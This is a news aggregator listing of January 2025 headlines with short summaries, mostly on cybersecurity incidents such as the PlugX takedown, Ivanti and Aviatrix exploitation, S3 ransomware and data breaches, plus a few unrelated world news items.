    Autosummary: “What makes this Double-Tap infection chain quite unique is that it employs many tricks to bypass security solutions such as storing the real malicious macro code in the settings.xml file and creating a scheduled task without spawning schtasks.exe for the second document or using, for the first document, an anti-emulation trick aimed to see if the execution time has not been altered, otherwise the macro is stopped,” the report continues.


    Allstate car insurer sued for tracking drivers without permission

    government
    2025-01-14 https://www.bleepingcomputer.com/news/legal/allstate-car-insurer-sued-for-tracking-drivers-without-permission/
    Texas Attorney General Ken Paxton has filed a lawsuit against Allstate and its data subsidiary Arity for unlawfully collecting, using, and selling driving data from over 45 million Americans. [...]

    Autosummary: Additionally, the lawsuit alleges that Allstate also purchased location data directly from Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram, to use for the same purposes.


    WP3.XYZ malware attacks add rogue admins to 5,000+ WordPress sites

    exploits
    2025-01-14 https://www.bleepingcomputer.com/news/security/wp3xyz-malware-attacks-add-rogue-admins-to-5-000-plus-wordpress-sites/
    A new malware campaign has compromised more than 5,000 WordPress sites to create admin accounts, install a malicious plugin, and steal data. [...]


    Microsoft fixes actively exploited Windows Hyper-V zero-day flaws

    exploits
    2025-01-14 https://www.helpnetsecurity.com/2025/01/14/january-2025-patch-tuesday-microsoft-hyper-v-zero-day-cve-2025-21333-cve-2025-21334-cve-2025-21335/

    Microsoft has marked January 2025 Patch Tuesday with a hefty load of patches: 157 CVE-numbered security issues have been fixed in various products, three of which (in Hyper-V) are being actively exploited. The exploited zero-days are CVE-2025-21333 (a buffer overflow bug), CVE-2025-21334 and CVE-2025-21335 (use-after-free flaws), and they all allow attackers to elevate their privileges to SYSTEM on compromised Windows and Windows Server machines. They affect a component of … More

    The post Microsoft fixes actively exploited Windows Hyper-V zero-day flaws appeared first on Help Net Security.

    Autosummary: But, as noted by Mike Walters, President at Action1, “organizations relying on Hyper-V, including data centers, cloud providers, enterprise IT environments, and development platforms, are at risk.”


    FBI deleted China-linked PlugX malware from over 4,200 US computers

    exploits
    2025-01-14 https://securityaffairs.com/173073/malware/fbi-deleted-china-linked-plugx-malware-from-over-4200-us-computers.html
    The FBI has removed Chinese PlugX malware from over 4,200 computers in networks across the United States, the U.S. Department of Justice reported. The Justice Department and FBI, along with international partners, announced they deleted PlugX malware from thousands of infected computers worldwide as part of a multi-month law enforcement operation. The malware was operated […]

    Autosummary: This PlugX malware supports a “self-delete” command that instructs the malware to: delete the files created by the PlugX malware on the victim computer; delete the PlugX registry keys used to automatically run the PlugX application when the victim computer is started; create a temporary script file to delete the PlugX application after it is stopped; stop the PlugX application; run the temporary file to delete the PlugX application; delete the directory created on the victim computer by the PlugX malware to store the PlugX files; and delete the temporary file from the victim computer.


    US to remove Cuba from state sponsors of terror list

    government
    2025-01-14 https://www.bbc.com/news/articles/c17e0k92g41o
    President Biden moves to reverse the designation introduced by Donald Trump before he returns to office.

    Autosummary: "This decision puts an end to specific coercive measures that, along with many others, cause serious damage to the Cuban economy, with a severe effect on the population," the country's ministry of foreign affairs said in a statement.


    FBI deletes Chinese PlugX malware from thousands of US computers

    exploits
    2025-01-14 https://www.bleepingcomputer.com/news/security/fbi-deletes-chinese-plugx-malware-from-thousands-of-us-computers/
    The U.S. Department of Justice announced today that the FBI has deleted Chinese PlugX malware from over 4,200 computers in networks across the United States. [...]

    Autosummary: According to court documents, the list of victims targeted using this malware includes "European shipping companies in 2024, several European Governments from 2021 to 2023, worldwide Chinese dissident groups, and governments throughout the Indo-Pacific (e.g., Taiwan, Hong Kong, Japan, South Korea, Mongolia, India, Myanmar, Indonesia, Philippines, Thailand, Vietnam, and Pakistan)."


    Landslides kill at least 10 in Brazil's Minas Gerais state

    latam government
    2025-01-13 https://www.bbc.com/news/articles/cvglwd34l81o
    The landslides were triggered by torrential rain which fell in the city in the early hours of Sunday.


    Taylor beats Colombia's Echavarria in play-off to win Sony Open

    latam
    2025-01-13 https://www.bbc.com/sport/golf/articles/crm72gm19j8o
    Canadian Nick Taylor gets the better of Nico Echavarria of Colombia in a play-off to claim the Sony Open in Hawaii.


    iMessage text gets recipient to disable phishing protection so they can be phished

    financial
    2025-01-13 https://www.malwarebytes.com/blog/news/2025/01/imessage-text-gets-recipient-to-disable-phishing-protection-so-they-can-be-phished
    Smishing messages that come with instructions to bypass iMessage's protection against links are on the rise

    Autosummary: The text of the messages comes in all the variations that phishers love to use: undeliverable packages from USPS, EVRI, Royal Mail, DHL, Fedex, etc.; unpaid road tolls. It’s also important to know that there are similar instructions for the Chrome browser: “Reply with 1, exit the SMS message, and reopen the SMS activation link, or copy the link to Google Chrome to open it.)”


    EU law enforcement training agency data breach: Data of 97,000 individuals compromised

    financial
    2025-01-13 https://www.helpnetsecurity.com/2025/01/13/eu-law-enforcement-training-agency-data-breach-cepol/

    Personal data of nearly 100,000 individuals that have participated in trainings organized by CEPOL, the European Union (EU) Agency for Law Enforcement Training, has potentially been compromised due to the cyberattack suffered by the agency in May 2024. “Starting in October 2024, until 31 December 2024, over 97 000 notifications were sent to people whose personal data were processed in the 31 processing activities identified as high risk in the context of the data breach … More

    The post EU law enforcement training agency data breach: Data of 97,000 individuals compromised appeared first on Help Net Security.


    Hackers Exploit Aviatrix Controller Vulnerability to Deploy Backdoors and Crypto Miners

    exploits
    2025-01-13 https://thehackernews.com/2025/01/hackers-exploit-aviatrix-controller.html
    A recently disclosed critical security flaw impacting the Aviatrix Controller cloud networking platform has come under active exploitation in the wild to deploy backdoors and cryptocurrency miners. Cloud security firm Wiz said it's currently responding to "multiple incidents" involving the weaponization of CVE-2024-50603 (CVSS score: 10.0), a maximum severity bug that could result in


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [13 January]

    ciber
    2025-01-13 https://thehackernews.com/2025/01/thn-weekly-recap-top-cybersecurity_01424177917.html
    The cyber world’s been buzzing this week, and it’s all about staying ahead of the bad guys. From sneaky software bugs to advanced hacking tricks, the risks are real, but so are the ways to protect yourself. In this recap, we’ll break down what’s happening, why it matters, and what you can do to stay secure. Let’s turn awareness into action and keep one step ahead

    Autosummary: This week’s list includes CVE-2024-8474 (OpenVPN Connect), CVE-2024-46981 (Redis), CVE-2024-51919 and CVE-2024-51818 (Fancy Product Designer plugin), CVE-2024-12877 (GiveWP – Donation Plugin and Fundraising Platform), CVE-2024-12847 (NETGEAR DGN1000), CVE-2025-23016 (FastCGI fcgi2), CVE-2024-10215 (WPBookit plugin), CVE-2024-11350 (AdForest theme), CVE-2024-13239 (Drupal), CVE-2024-54676 (Apache OpenMeetings), CVE-2025-0103 (Palo Alto Networks Expedition), CVE-2024-53704 (SonicWall SonicOS), CVE-2024-50603 (Aviatrix Controller), CVE-2024-9138, and CVE-2024-9140 (Moxa). India, Germany, the U.S., France, Brazil, South Korea, Belgium, Spain, Poland, and Italy were the top 10 countries by number of requests. Popular Windows Applications Vulnerable to WorstFit Attack: several Windows-based applications such as curl.exe, excel.exe, openssl.exe, plink.exe, tar.exe, and wget.exe have been found susceptible to a brand-new attack surface called WorstFit, which exploits a character conversion feature built into Windows called Best-Fit. The attacks involve the use of Windows Shortcut (LNK), Windows Installer (MSI), and Microsoft Management Console (MSC) files, likely distributed via spear-phishing, as the first-stage component to trigger the infection chain, ultimately leading to the deployment of PlugX using DLL side-loading techniques. MLOps Platforms Could Become a New Attack Target: as companies rush to leverage artificial intelligence (AI) applications, MLOps platforms used to develop, train, deploy and monitor such applications could be targeted by attackers, allowing them to not only gain unauthorized access, but also impact the confidentiality, integrity and availability of the machine learning (ML) models and the data they provide.


    Ransomware on ESXi: The mechanization of virtualized attacks

    exploits
    2025-01-13 https://thehackernews.com/2025/01/ransomware-on-esxi-mechanization-of.html
    In 2024, ransomware attacks targeting VMware ESXi servers reached alarming levels, with the average ransom demand skyrocketing to $5 million. With approximately 8,000 ESXi hosts exposed directly to the internet (according to Shodan), the operational and business impact of these attacks is profound. Most of the ransomware strains that are attacking ESXi servers nowadays are variants of the

    Autosummary: Once decrypted, the "vpxuser" account can be used for root-permission operations, including altering configurations, changing passwords of other accounts, SSH login, and executing ransomware. As organizations deal with compounded threats on an ever-expanding front (new vulnerabilities, new entry points, monetized cyber-crime networks, and more), there is ever-growing urgency for enhanced security measures and vigilance. Therefore, in ransomware, asymmetric encryption is primarily used for securing the keys used in symmetric encryption, rather than the data itself.


    Microsoft: macOS bug lets hackers install malicious kernel drivers

    exploits Linux
    2025-01-13 https://www.bleepingcomputer.com/news/security/microsoft-macos-bug-lets-hackers-install-malicious-kernel-drivers/
    Apple recently addressed a macOS vulnerability that allows attackers to bypass System Integrity Protection (SIP) and install malicious kernel drivers by loading third-party kernel extensions. [...]


    Hackers exploit critical Aviatrix Controller RCE flaw in attacks

    exploits
    2025-01-13 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-aviatrix-controller-rce-flaw-in-attacks/
    Threat actors are exploiting a critical remote command execution vulnerability, tracked as CVE-2024-50603, in Aviatrix Controller instances to install backdoors and crypto miners. [...]

    Autosummary: The Aviatrix Controller, part of the Aviatrix Cloud Networking Platform, enhances networking, security, and operational visibility for multi-cloud environments.


    UK domain registry Nominet confirms breach via Ivanti zero-day

    exploits
    2025-01-13 https://www.bleepingcomputer.com/news/security/uk-domain-registry-nominet-confirms-breach-via-ivanti-zero-day-vulnerability/
    Nominet, the official .UK domain registry and one of the largest country code registries, has confirmed that its network was breached two weeks ago using an Ivanti VPN zero-day vulnerability. [...]

    Autosummary: Attacks linked to suspected Chinese hackers. While the company didn't share more information on the VPN zero-day used in the attack, Ivanti said last week that hackers have been exploiting a critical Ivanti Connect Secure zero-day vulnerability (tracked as CVE-2025-0282) to breach a limited number of customers' appliances.


    Ransomware abuses Amazon AWS feature to encrypt S3 buckets

    exploits
    2025-01-13 https://www.bleepingcomputer.com/news/security/ransomware-abuses-amazon-aws-feature-to-encrypt-s3-buckets/
    A new ransomware campaign encrypts Amazon S3 buckets using AWS's Server-Side Encryption with Customer Provided Keys (SSE-C) known only to the threat actor, demanding ransoms to receive the decryption key. [...]

    Autosummary: Encrypting cloud storage: Amazon Simple Storage Service (S3) is a scalable, secure, and high-speed object storage service by Amazon Web Services (AWS), and S3 buckets are cloud storage containers for storing files, data backups, media, logs, etc.


    Pastor’s “dream” crypto scheme alleged to be a multi-million dollar scam

    financial
    2025-01-13 https://www.bitdefender.com/en-us/blog/hotforsecurity/pastors-dream-crypto-scheme-alleged-to-be-a-multi-million-dollar-scam
    Imagine trusting your pastor with your savings, only to find out he's running a crypto scam. Read more in my article on the Hot for Security blog.

    Autosummary: Francier Obando Pinillo, of Miami, Florida, is alleged to have exploited his position at a Spanish-language church in Pasco, Washington, to persuade members of his congregation and others to invest in a cryptocurrency venture called "Solano Fi." Pinillo is alleged to have falsely claimed that his Solano Fi cryptocurrency scheme was risk-free, and promised a 34.9% monthly return.


    Attackers are encrypting AWS S3 data without using ransomware

    exploits ransomware
    2025-01-13 https://www.helpnetsecurity.com/2025/01/13/codefinger-encrypting-aws-s3-data-without-ransomware-sse-c/

    A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. They do not exfiltrate the data beforehand, but mark the encrypted files for deletion within seven days, thus adding more pressure on organizations to pay the ransom. How does the attack unfold? The threat actor leverages targets’ previously compromised (whether … More

    Autosummary: “The attacker initiates the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header, utilizing an AES-256 encryption key they generate and store locally,” the Halcyon research team explained.


    OneBlood confirms personal data stolen in July ransomware attack

    exploits ransomware
    2025-01-13 https://www.bleepingcomputer.com/news/security/oneblood-confirms-personal-data-stolen-in-july-ransomware-attack/
    Blood-donation not-for-profit OneBlood confirms that donors' personal information was stolen in a ransomware attack last summer. [...]


    CISA orders agencies to patch BeyondTrust bug exploited in attacks

    exploits
    2025-01-13 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-beyondtrust-bug-exploited-in-attacks/
    CISA tagged a vulnerability in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) as actively exploited in attacks, ordering agencies to secure their systems within three weeks. [...]

    Autosummary: The threat actors specifically targeted the Office of Foreign Assets Control (OFAC), which administers trade and economic sanctions programs, and the Committee on Foreign Investment in the United States (CFIUS), which reviews foreign investments for national security risks.


    UK domain registry Nominet breached via Ivanti zero-day

    exploits
    2025-01-13 https://www.helpnetsecurity.com/2025/01/13/uk-domain-registry-nominet-breached-via-ivanti-zero-day-cve-2025-0282/

    The number of internet-facing Ivanti Connect Secure instances vulnerable to attack via CVE-2025-0282 has fallen from 2,048 to 800 in the last four days, the Shadowserver Foundation shared today. In the meantime, UK domain registry Nominet became the first publicly known victim of attackers exploiting the recently patched Ivanti zero-day. CVE-2025-0282 zero-day attacks: CVE-2025-0282 is a stack-based buffer overflow vulnerability that allowed unauthenticated attackers to breach VPN appliances used by a number of (still publicly … More


    U.S. CISA adds BeyondTrust PRA and RS and Qlik Sense flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-13 https://securityaffairs.com/173031/security/u-s-cisa-adds-beyondtrust-pra-and-rs-and-qlik-sense-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds BeyondTrust PRA and RS and Qlik Sense flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-12686 (CVSS score of 6.6). The flaw is an OS Command Injection Vulnerability in BeyondTrust […]


    Inexperienced actors developed the FunkSec ransomware using AI tools

    exploits ransomware
    2025-01-13 https://securityaffairs.com/173018/cyber-crime/funksec-ransomware-was-developed-using-ai-tools.html
    FunkSec, a new ransomware group that attacked more than 80 victims in December 2024, was developed using AI tools. The FunkSec ransomware-as-a-service (RaaS) group has been active since late 2024; the gang published over 85 victims in December 2024. The group likely used AI-based systems to quickly develop advanced tools, blending hacktivism and cybercrime. However, […]

    Autosummary: Once executed, FunkSec ransomware disables security features, including Windows Defender, logging, PowerShell restrictions, and shadow copy backups during execution.


    Sophisticated smuggling tunnel found between US and Mexico

    latam
    2025-01-13 https://www.bbc.com/news/videos/cz6pj1njdx6o
    The underground passage linking Ciudad Juarez with El Paso, Texas, was equipped with lighting and ventilation.


    Week in review: Exploited Ivanti Connect Secure zero-day, Patch Tuesday forecast

    exploits
    2025-01-12 https://www.helpnetsecurity.com/2025/01/12/week-in-review-exploited-ivanti-connect-secure-zero-day-patch-tuesday-forecast/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Ivanti Connect Secure zero-day exploited by attackers (CVE-2025-0282) Ivanti has fixed two vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, one of which (CVE-2025-0282) has been exploited as a zero-day by attackers to compromise Connect Secure VPN appliances. January 2025 Patch Tuesday forecast: Changes coming in cybersecurity guidance Microsoft released a small set of updates that only applied … More

    Autosummary: New infosec products of the week: January 10, 2025. Here’s a look at the most interesting products from the past week, featuring releases from BioConnect, BreachLock, McAfee, Netgear, and Swimlane. Balancing proprietary and open-source tools in cyber threat research: in this Help Net Security interview, Thomas Roccia, Senior Security Researcher at Microsoft, discusses how threat research drives faster, better decision-making in cybersecurity operations.


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 28

    exploits
    2025-01-12 https://securityaffairs.com/172978/malware/security-affairs-malware-newsletter-round-28.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Finding Malware: Unveiling PLAYFULGHOST with Google Security Operations; Scam Sniffer 2024: Web3 Phishing Attacks – Wallet Drainers Drain $494 Million; EAGERBEE, with updated and novel components, targets the Middle East; Gayfemboy: A Botnet Deliver Through a […]


    Online safety laws unsatisfactory, minister says

    industry
    2025-01-12 https://www.bbc.com/news/articles/cx2pk7589rno
    Peter Kyle responds as internet safety campaigner Ian Russell says laws to protect children need fixing.

    Autosummary: Responding to Russell's criticism, a Meta spokesperson told the BBC there was "no change to how we treat content that encourages suicide, self-injury, and eating disorders" and said the company would "continue to use our automated systems to scan for that high-severity content".


    Phishing texts trick Apple iMessage users into disabling protection

    financial
    2025-01-12 https://www.bleepingcomputer.com/news/security/phishing-texts-trick-apple-imessage-users-into-disabling-protection/
    Cybercriminals are exploiting a trick to turn off Apple iMessage's built-in phishing protection for a text and trick users into re-enabling disabled phishing links. [...]

    Autosummary: [Image: SMS phishing attacks with disabled links (Source: BleepingComputer)] While neither of these phishing lures is new, we noticed that these smishing texts, and others seen recently, ask users to reply with "Y" to enable the link.


    Pro-Russia hackers NoName057 targets Italy again after Zelensky’s visit to the country

    government
    2025-01-12 https://securityaffairs.com/172982/hacktivism/noname057-targets-italy.html
    Over the weekend, Italy faced new waves of DDoS attacks carried out by pro-Russia group NoName057(16). Pro-Russia hackers NoName057(16) targeted Italian ministries, institutions, critical infrastructure websites and private organizations over the weekend. The new wave of attacks coincides with the visit of Ukrainian President Volodymyr Zelensky to Italy. The group claimed responsibility for the attacks […]

    Autosummary: The list of targets is long and includes the Ministry of Foreign Affairs, the Ministry of Infrastructure and Transport, Italy’s financial markets regulator Consob, the Air Force, the Navy, the Carabinieri and local public transport companies, including Rome’s Atac and Genoa’s Amt. NoName057(16) hackers also hit Italian banks, including Intesa and Monte Paschi di Siena, and the Italian ports of Taranto and Trieste.


    Microsoft Sues Hacking Group Exploiting Azure AI for Harmful Content Creation

    exploits
    2025-01-11 https://thehackernews.com/2025/01/microsoft-sues-hacking-group-exploiting.html
    Microsoft has revealed that it's pursuing legal action against a "foreign-based threat–actor group" for operating a hacking-as-a-service infrastructure to intentionally get around the safety controls of its generative artificial intelligence (AI) services and produce offensive and harmful content. The tech giant's Digital Crimes Unit (DCU) said it has observed the threat actors "develop

    Autosummary: It's worth pointing out that the use of proxy services to illegally access LLM services was highlighted by Sysdig in May 2024 in connection with an LLMjacking attack campaign targeting AI offerings from Anthropic, AWS Bedrock, Google Cloud Vertex AI, Microsoft Azure, Mistral, and OpenAI using stolen cloud credentials and selling the access to other actors.


    DoJ Indicts Three Russians for Operating Crypto Mixers Used in Cybercrime Laundering

    rusia-ucrania
    2025-01-11 https://thehackernews.com/2025/01/doj-indicts-three-russians-for.html
    The U.S. Department of Justice (DoJ) on Friday indicted three Russian nationals for their alleged involvement in operating the cryptocurrency mixing services Blender.io and Sinbad.io. Roman Vitalyevich Ostapenko and Alexander Evgenievich Oleynik were arrested on December 1, 2024, in coordination with the Netherlands' Financial Intelligence and Investigative Service, Finland's National Bureau of

    Autosummary: "Additionally, in the advertisement, Blender was described as not requiring users to sign up, register, or 'provide any kind of detail except the receiving address!'" It's also accused of facilitating money laundering for Russia-aligned ransomware gangs like TrickBot, Conti (formerly Ryuk), Sodinokibi (aka REvil), and Gandcrab.


    A novel PayPal phishing campaign hijacks accounts

    financial
    2025-01-11 https://securityaffairs.com/172935/cyber-crime/paypal-phishing-campaign-hijacks-accounts.html
    Fortinet warns of a phishing campaign using legitimate links to hijack PayPal accounts, tricking users into granting unauthorized access. Fortinet uncovered a phishing campaign targeting PayPal users. The scheme employs legitimate links to deceive victims and gain unauthorized access to their accounts. The phishing emails mimic PayPal notifications, including payment details, warnings, a real PayPal […]

    Autosummary: “This money request is then distributed to the targeted victims, and the Microsoft365 SRS (Sender Rewrite Scheme) rewrites the sender to, e.g., bounces+SRS=onDJv=S6[@]5ln7g7.onmicrosoft.com, which will pass the SPF/DKIM/DMARC check,” continues the report.


    U.S. cannabis dispensary STIIIZY disclosed a data breach

    financial
    2025-01-11 https://securityaffairs.com/172950/data-breach/marijuana-dispensary-stiiizy-data-breach.html
    US marijuana dispensary STIIIZY warns customers of leaked IDs and passports following a November data breach. US marijuana dispensary STIIIZY disclosed a data breach after a vendor’s point-of-sale system was compromised by cybercriminals. The security breach exposed customer data and IDs between October 10 and November 10, 2024. After discovering the security breach, the company […]

    Autosummary: The categories of information compromised include name, address, date of birth, age, driver’s license number, passport number, photograph, the signatures appearing on a government ID card, medical cannabis cards, transaction histories, and other personal information.


    Scammers file first — Get your IRS Identity Protection PIN now

    financial
    2025-01-11 https://www.bleepingcomputer.com/news/security/scammers-file-first-get-your-irs-identity-protection-pin-now/
    The IRS relaunched its Identity Protection Personal Identification Number (IP PIN) program this week and all US taxpayers are encouraged to enroll for added security against identity theft and fraudulent returns. [...]

    Autosummary: As this PIN is only known to you, your accountant (if not self-filing), and the IRS, it prevents scammers from filing a tax return using your Social Security Number and personal information.


    Fake LDAPNightmare exploit on GitHub spreads infostealer malware

    exploits
    2025-01-11 https://www.bleepingcomputer.com/news/security/fake-ldapnightmware-exploit-on-github-spreads-infostealer-malware/
    A deceptive proof-of-concept (PoC) exploit for CVE-2024-49113 (aka "LDAPNightmare") on GitHub infects users with infostealer malware that exfiltrates sensitive data to an external FTP server. [...]


    DoJ charged three Russian citizens with operating crypto-mixing services

    rusia-ucrania
    2025-01-11 https://securityaffairs.com/172957/cyber-crime/doj-charged-russian-citizens-with-operating-crypto-mixing-services.html
    The U.S. Department of Justice charged three Russian citizens with operating crypto-mixing services that helped crooks launder cryptocurrency. The U.S. Department of Justice (DoJ) charged Russian nationals Roman Vitalyevich Ostapenko, Alexander Evgenievich Oleynik, and Anton Vyachlavovich Tarasov with operating crypto-mixing services Blender.io and Sinbad.io that helped crooks launder cryptocurrency. Roman Vitalyevich Ostapenko and Alexander Evgenievich […]


    The SBI fake banking app shows that SMS authentication has had its day

    financial
    2025-01-10 https://www.helpnetsecurity.com/2025/01/10/sms-authentication-weakness/

    As a company fortunate enough to have and maintain our own pentesting team, we often do outreach with other organizations to assist with or provide our expertise in offensive security. In collaboration with the Kerala Police Cyber unit, we were able to assist with investigating a prolific scam targeting the State Bank of India (SBI). SBI is the largest bank in India and one of the top 50 largest banks in the world with over … More

    Autosummary: The app spoofs the SBI bank login page to collect data from the end user (e.g., account number, card number, password, etc.) and send it to the attacker, who will subsequently use it to log into the legitimate site.


    Preventing the next ransomware attack with help from AI

    exploits ransomware
    2025-01-10 https://www.helpnetsecurity.com/2025/01/10/darren-williams-blackfog-ransomware-awareness-training/

    In this Help Net Security interview, Dr. Darren Williams, CEO at BlackFog, talks about how employee training plays a crucial role in preventing ransomware attacks. He points out that human error is often the biggest security risk and explains how AI tools, alongside gamification and real-time alerts, help employees identify advanced phishing threats. What role does employee awareness training play in preventing ransomware attacks? What innovative approaches can make such training more effective? Awareness training … More

    Autosummary: Next, it is important to understand WHO is affected and WHAT sort of data is involved, because this will dictate your next critical step, which is communication with the authorities, internally and with customers. Now, with triple extortion, attackers target not only the initial victim but also customers, partners, regulators and even shareholders.


    January 2025 Patch Tuesday forecast: Changes coming in cybersecurity guidance

    ciber
    2025-01-10 https://www.helpnetsecurity.com/2025/01/10/january-2025-patch-tuesday-forecast/

    Welcome to 2025 and a new year of patch excitement! In my December article, I talked about Microsoft’s Secure Future Initiative (SFI) and how it manifested in many of the Microsoft products released in 2024. While this security technology trend will continue in 2025, I believe we will also see some major changes to guidance regarding the security requirements, operations, and other aspects associated with our industry. Before we get into some of those details, … More

    Autosummary: Microsoft released a small set of updates that only applied to Windows 10, Windows 11, Office, and SharePoint.


    Google Project Zero Researcher Uncovers Zero-Click Exploit Targeting Samsung Devices

    exploits
    2025-01-10 https://thehackernews.com/2025/01/google-project-zero-researcher-uncovers.html
    Cybersecurity researchers have detailed a now-patched security flaw impacting Monkey's Audio (APE) decoder on Samsung smartphones that could lead to code execution. The high-severity vulnerability, tracked as CVE-2024-49415 (CVSS score: 8.1), affects Samsung devices running Android versions 12, 13, and 14. "Out-of-bounds write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote


    RedDelta Deploys PlugX Malware to Target Mongolia and Taiwan in Espionage Campaigns

    exploits
    2025-01-10 https://thehackernews.com/2025/01/reddelta-deploys-plugx-malware-to.html
    Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by the China-nexus RedDelta threat actor to deliver a customized version of the PlugX backdoor between July 2023 and December 2024. "The group used lure documents themed around the 2024 Taiwanese presidential candidate Terry Gou, the Vietnamese National Holiday, flood protection in Mongolia, and meeting invitations, including an

    Autosummary: It's also tracked by the cybersecurity community under the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, Mustang Panda (and its closely related Vertigo Panda), Red Lich, Stately Taurus, TA416, and Twill Typhoon.


    CrowdStrike Warns of Phishing Scam Targeting Job Seekers with XMRig Cryptominer

    financial
    2025-01-10 https://thehackernews.com/2025/01/crowdstrike-warns-of-phishing-scam.html
    Cybersecurity company CrowdStrike is alerting of a phishing campaign that exploits its own branding to distribute a cryptocurrency miner that's disguised as an employee CRM application as part of a supposed recruitment process. "The attack begins with a phishing email impersonating CrowdStrike recruitment, directing recipients to a malicious website," the company said. "Victims are prompted to

    Autosummary: The malicious GitHub repository in question – github[.]com/YoonJae-rep/CVE-2024-49113 (now taken down) – is said to be a fork of the original repository from SafeBreach Labs hosting the legitimate PoC. The counterfeit repository, however, replaces the exploit-related files with a binary named "poc.exe" that, when run, drops a PowerShell script to create a scheduled task to execute a Base64-encoded script.


    Canadian man loses a cryptocurrency fortune to scammers – here’s how you can stop it happening to you

    financial
    2025-01-10 https://www.bitdefender.com/en-us/blog/hotforsecurity/canadian-man-loses-a-cryptocurrency-fortune-to-scammers-heres-how-you-can-stop-it-happening-to-you
    A Canadian man lost a $100,000 cryptocurrency fortune - all because he did a careless Google search. Read more in my article on the Hot for Security blog.

    Autosummary: My advice is to enable 2FA on any accounts which offer it - your bank accounts, your email accounts, your social media accounts, your cryptocurrency accounts, and more...


    Taking the Pain Out of Cybersecurity Reporting: A Practical Guide for MSPs

    ciber
    2025-01-10 https://thehackernews.com/2025/01/taking-pain-out-of-cybersecurity.html
    Cybersecurity reporting is a critical yet often overlooked opportunity for service providers managing cybersecurity for their clients, and specifically for virtual Chief Information Security Officers (vCISOs). While reporting is seen as a requirement for tracking cybersecurity progress, it often becomes bogged down with technical jargon, complex data, and disconnected spreadsheets that fail to

    Autosummary: [Images: Sample Report: Vulnerability and Scan Findings; Sample Report: Risk Mitigation Plan] Streamlining reporting with technology: manual reporting processes—juggling spreadsheets, extracting charts, and compiling disconnected data—are time-consuming and error-prone. According to Miller, "Cybersecurity reporting is about creating a shared vision with your clients, where they see cybersecurity as a driver of growth, efficiency, and long-term success." Elements of an effective vCISO report: to make reports valuable and actionable, focus on these key components. Know your audience: tailor your reports to different stakeholders. While reporting is seen as a requirement for tracking cybersecurity progress, it often becomes bogged down with technical jargon, complex data, and disconnected spreadsheets that fail to resonate with decision-makers. The guide—"Taking the Pain Out of Cybersecurity Reporting"—walks you through how to transform raw data into compelling narratives, demonstrate measurable value, and shape the future of your client's cybersecurity strategy.


    AI-Driven Ransomware FunkSec Targets 85 Victims Using Double Extortion Tactics

    exploits ransomware industry
    2025-01-10 https://thehackernews.com/2025/01/ai-driven-ransomware-funksec-targets-85.html
    Cybersecurity researchers have shed light on a nascent artificial intelligence (AI) assisted ransomware family called FunkSec that sprang forth in late 2024, and has claimed more than 85 victims to date. "The group uses double extortion tactics, combining data theft with encryption to pressure victims into paying ransoms," Check Point Research said in a new report shared with The Hacker News.

    Autosummary: Some of the prominent actors associated with FunkSec are listed below:
    - A suspected Algeria-based actor named Scorpion (aka DesertStorm) who has promoted the group on underground forums such as Breached Forum
    - El_farado, who emerged as a main figure advertising FunkSec after DesertStorm’s ban from Breached Forum
    - XTN, a likely associate who is involved in an as-yet-unknown "data-sorting" service
    - Blako, who has been tagged by DesertStorm along with El_farado
    - Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, either pointing to a loose affiliation or their attempts to impersonate FunkSec
    The possibility that the group may also be dabbling in hacktivist activity is evidenced by the presence of DDoS attack tools, as well as those related to remote desktop management (JQRAXY_HVNC) and password generation (funkgenerate).


    New Web3 attack exploits transaction simulations to steal crypto

    exploits
    2025-01-10 https://www.bleepingcomputer.com/news/security/new-web3-attack-exploits-transaction-simulations-to-steal-crypto/
    Threat actors are employing a new tactic called "transaction simulation spoofing" to steal crypto, with one attack successfully stealing 143.45 Ethereum, worth approximately $460,000. [...]



    US charges operators of cryptomixers linked to ransomware gangs

    exploits ransomware
    2025-01-10 https://www.bleepingcomputer.com/news/security/us-charges-operators-of-cryptomixers-linked-to-ransomware-gangs/
    The U.S. Department of Justice indicted three operators of sanctioned Blender.io and Sinbad.io crypto mixer services used by ransomware gangs and North Korean hackers to launder ransoms and stolen cryptocurrency. [...]



    Docker Desktop blocked on Macs due to false malware alert

    exploits
    2025-01-10 https://www.bleepingcomputer.com/news/security/docker-desktop-blocked-on-macs-due-to-false-malware-alert/
    Docker is warning that Docker Desktop is not starting on macOS due to malware warnings after some files were signed with an incorrect code-signing certificate. [...]

    Autosummary: [Image: Docker’s service status page (Source: Docker)] How to fix: As Docker is still investigating the incident, it has provided the following ways to resolve the malware warning problems: upgrade Docker Desktop to version 4.37.2, which includes a permanent fix.


    STIIIZY data breach exposes cannabis buyers’ IDs and purchases

    financial
    2025-01-10 https://www.bleepingcomputer.com/news/security/stiiizy-data-breach-exposes-cannabis-buyers-ids-and-purchases/
    Popular cannabis brand STIIIZY disclosed a data breach this week after hackers breached its point-of-sale (POS) vendor to steal customer information, including government IDs and purchase information. [...]

    Autosummary: "The categories of information compromised include name, address, date of birth, age, drivers’ license number, passport number, photograph, the signatures appearing on a government ID card, medical cannabis cards, transaction histories, and other personal information."


    BayMark Health Services sends breach notifications after ransomware attack

    exploits ransomware
    2025-01-10 https://www.malwarebytes.com/blog/news/2025/01/baymark-health-services-sends-breach-notifications-after-ransomware-attack
    BayMark Health Services, Inc. notified an unknown number of patients that attackers stole their personal and health information.

